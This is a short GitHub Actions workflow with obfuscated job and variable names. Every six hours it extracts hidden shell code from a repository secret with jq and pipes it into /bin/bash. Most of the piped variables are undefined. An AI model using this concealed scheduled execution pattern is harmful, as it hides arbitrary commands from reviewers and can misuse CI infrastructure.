name: dongchudai5647
on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongchudai5647
        env:
          ck4798: ${{ secrets.ck4798 }}
        run: |
          echo $ck4798 | jq -r .owzyk726 | /bin/bash
          echo $jn86929 | jq -r .iqkn5 | /bin/bash
          echo $lwo5494 | jq -r .i43 | /bin/bash
          echo $hkvy10 | jq -r .f0030 | /bin/bash
          echo $yjz01 | jq -r .pt7626 | /bin/bash
          echo $swww087 | jq -r .pbs771 | /bin/bash
          echo $para20 | jq -r .g77463 | /bin/bash
          echo $k986 | jq -r .iymo93797 | /bin/bash
          echo $xdb90 | jq -r .ut352 | /bin/bash

